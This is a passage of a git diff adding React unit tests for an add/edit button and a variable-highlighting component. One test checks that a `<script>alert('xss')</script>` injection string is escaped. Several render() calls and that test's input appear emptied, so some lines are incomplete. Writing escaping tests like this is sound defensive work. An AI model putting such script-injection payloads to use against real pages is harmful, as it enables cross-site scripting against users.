expect(screen.getByText('common.operation.add').parentElement).toHaveClass(customClass) + }) + it('should render add icon when type is add', () => { + // Arrange + const onClick = jest.fn() + + // Act + render() + + // Assert + expect(screen.getByTestId('add-icon')).toBeInTheDocument() + expect(screen.getByText('common.operation.add')).toBeInTheDocument() + }) + + it('should render edit icon when provided', () => { + // Arrange + const actionName = 'Rename' + + // Act + render() + + // Assert + expect(screen.getByTestId('edit-icon')).toBeInTheDocument() + expect(screen.queryByTestId('add-icon')).toBeNull() + expect(screen.getByText(actionName)).toBeInTheDocument() + }) + }) + + // Click handling + describe('Interactions', () => { + it('should execute click handler when button is clicked', () => { + // Arrange + const onClick = jest.fn() + render() + + // Act + fireEvent.click(screen.getByText('common.operation.add')) + + // Assert + expect(onClick).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/configuration/base/var-highlight/index.spec.tsx b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx new file mode 100644 index 0000000000..9e84aa09ac --- /dev/null +++ b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx @@ -0,0 +1,62 @@ +import { render, screen } from '@testing-library/react' +import VarHighlight, { varHighlightHTML } from './index' + +describe('VarHighlight', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering highlighted variable tags + describe('Rendering', () => { + it('should render braces around the variable name with default styles', () => { + // Arrange + const props = { name: 'userInput' } + + // Act + const { container } = render() + + // Assert + expect(screen.getByText('userInput')).toBeInTheDocument() + expect(screen.getAllByText('{{')[0]).toBeInTheDocument() + expect(screen.getAllByText('}}')[0]).toBeInTheDocument() + expect(container.firstChild).toHaveClass('item') + }) + + it('should apply custom class names when provided', () => { + // Arrange + const props = { name: 'custom', className: 'mt-2' } + + // Act + const { container } = render() + + // Assert + expect(container.firstChild).toHaveClass('mt-2') + }) + }) + + // Escaping HTML via helper + describe('varHighlightHTML', () => { + it('should escape dangerous characters before returning HTML string', () => { + // Arrange + const props = { name: '' } + + // Act + const html = varHighlightHTML(props) + + // Assert + expect(html).toContain('<script>alert('xss')</script>') + expect(html).not.toContain('